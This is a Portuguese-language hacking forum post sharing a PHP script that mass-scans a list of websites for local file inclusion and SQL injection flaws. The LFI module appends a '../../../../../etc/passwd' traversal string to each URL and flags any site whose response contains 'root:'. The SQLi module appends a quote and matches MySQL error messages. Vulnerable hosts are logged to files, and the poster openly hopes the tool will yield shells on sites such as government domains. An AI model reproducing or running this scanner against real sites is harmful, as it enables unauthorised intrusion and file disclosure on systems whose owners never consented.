Segue o script que fiz para dar um aux na exploration de lfi/lfd/sqli
para nosso amigo choko da silva sauro ( WE EXPECT LFI SHELLS (: )
Src:
pastebin
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
thanks!
para nosso amigo choko da silva sauro ( WE EXPECT LFI SHELLS (: )
Código PHP:
php deejay.php lfi sites.txt
Código PHP:
php deejay.php sqli sites.txt
Código PHP:
<?php
/*
* Simple lfi/lfd/sqli aux by n4sss
* para => chokiiito!
* n-l4b@hotmail.com
*/
if(!@$argv[1] || !$argv[2])
{
print "-=-=-=-=-=-=-=-=-=-==-=-=\n";
print "| Simple |\n";
print "| /lfi/lfd/sqli/ |\n";
print "| scan |\n";
print "| by n4sss |\n";
print "-=-=-=-=-=-=-=-=-=-==-=-=\n";
print "\nUsage: php $argv[0] lfi/sqli sites.txt\n";
print "File mode:\n";
print "|===========================================|\n";
print "|LFI: |\n";
print "|http://site.com/download.php?arquivo= |\n";
print "|http://site.gov.br/pagina.php?visualizar= |\n";
print "|SQLI: |\n";
print "|http://site.org.br/noticia.php?id=30 |\n";
print "|===========================================|\n";
print "\n[+] done. \n";
}
elseif(@$argv[1] == "lfi")
{
print "-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "| Lfi/Lfd pwn |\n";
print "| by n4sss |\n";
print "| [+]LFx MODULE |\n";
print "-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
$sitelist = @file_get_contents("$argv[2]");
$cnt = count(explode("\n", $sitelist));
print "[~] Wait!\n";
print ".";
sleep(1);
print "..";
sleep(1);
print "...\n";
sleep(1);
print "[+] File loaded => $argv[2]\n";
print "[+] Total urls: $cnt\n";
sleep(4);
lfi($sitelist);
}
elseif(@$argv[1] == "sqli")
{
print "-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
print "| Simple |\n";
print "| Lfi/Lfd/sqli pwn |\n";
print "| by n4sss |\n";
print "| [+] Sqli MODULE |\n";
print "-=-=-=-=-=-=-=-=-=-=-=-=-=\n";
$sitelist = @file_get_contents("$argv[2]");
$cnt = count(explode("\n", $sitelist));
print "[~] Wait!\n";
print "[+] File loaded => $argv[2]\n";
print "[+] Total urls: $cnt\n";
sleep(2);
sqli($sitelist);
}
function log_open($data){
$fp = @fopen('lfi_vulns.txt', 'a');
@fwrite($fp, "$data\r\n");
@fclose($fp);
}
function log_open2($data){
$fp = @fopen('sqli_vulns.txt', 'a');
@fwrite($fp, "$data\r\n");
@fclose($fp);
}
function sqli($host)
{
global $sitelist;
$sql = explode("\n", $sitelist);
print "[+] Sql injection Verifier\n";
print "[~] Wait!\n";
foreach($sql as $sqlinj)
{
$w = $sqlinj.'\'';
$t = @file_get_contents($w);
if(preg_match("/MySQL|error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch_row()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $t))
{
echo "========================================\n";
echo "[~] Host => $sqlinj\n";
echo '[+] Vulnerable[>]'.$w;
echo "\n========================================\n\n";
log_open2("$sqlinj");
}
}
}
function lfi($host)
{
global $sitelist;
$nix = explode("\n", $sitelist);
print "[~] Scanning...\n";
$arg1 = "../../../../../etc/passwd";
foreach($nix as $nx)
{
sleep(2);
$a = $nx.$arg1;
$b = @file_get_contents($a);
if(preg_match("/root:/i", $b))
{
$result = $nx.$arg1;
echo "========================================\n";
echo "[~] Host => $nx\n";
echo '[+] Vulnerable => '.$result;
echo "\n========================================\n";
log_open("$nx.$arg1");
}
else
{
echo "========================================\n";
echo "[~] Host => $nx\n";
echo "[-] No lfi found, passing!\n";
echo "========================================\n";
}
}
}
?>
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
thanks!
Comment